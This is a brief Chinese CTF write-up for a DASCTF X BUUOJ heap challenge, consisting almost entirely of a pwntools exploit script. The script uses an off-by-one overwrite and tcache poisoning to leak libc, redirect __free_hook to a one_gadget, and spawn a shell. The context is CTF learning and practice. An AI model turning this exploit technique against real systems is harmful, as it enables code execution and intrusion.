[复现]2021 DASCTF X BUUOJ 五月大联动
由于我没ubuntu16就不复现第一个题了,直接第二个
正常的off by one
from pwn import *
context.os = 'linux'
context.log_level = "debug"
p = process('./pwn')
libc = ELF('./libc.so')
elf = ELF('./pwn')
s = lambda data :p.send(str(data))
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(str(data))
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda num :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
def debug():
gdb.attach(p)
pause()
def add(idx, size, con):
sla("choice:", "1")
sla("please choice your card:", str(idx))
sla("Infuse power:\n", str(size))
sa("quickly!", con)
def edit(idx, con):
sla("choice:", "2")
sla("please choice your card\n", str(idx))
sla("start your bomb show\n", con)
def delete(idx):
sla("choice:", "3")
sla("Which card:", str(idx))
def show(idx):
sla("choice:", "4")
sla("index:", str(idx))
add(0,0x18,'bpc')
add(1,0x20,'bpc')
add(2,0x20,'bpc')
add(3,0x20,'bpc')
for i in range(4, 11):
add(i, 0x80, "bpc")
for i in range(4, 11):
delete(i)
pl = 'a'*0x10 + p64(0) + p8(0x91)
edit(0,pl)
delete(1)
add(1,0x20,'bpc')
show(2)
ru("dedededededede:")
libcbase = uu64(r(6)) - 0x3EBCA0
leak('libcbase',libcbase)
free_hook = libcbase + libc.sym['__free_hook']
system = libcbase + 0x4f302
add(11,0x20,'bpc')
delete(11)
edit(2, p64(free_hook))
add(11, 0x20, "bpc")
add(12, 0x20,p64(system))
'''
0x4f2a5 execve("/bin/sh", rsp+0x40, environ)
constraints:
rsp & 0xf == 0
rcx == NULL
0x4f302 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL
0x10a2fc execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
#debug()
delete(12)
itr()
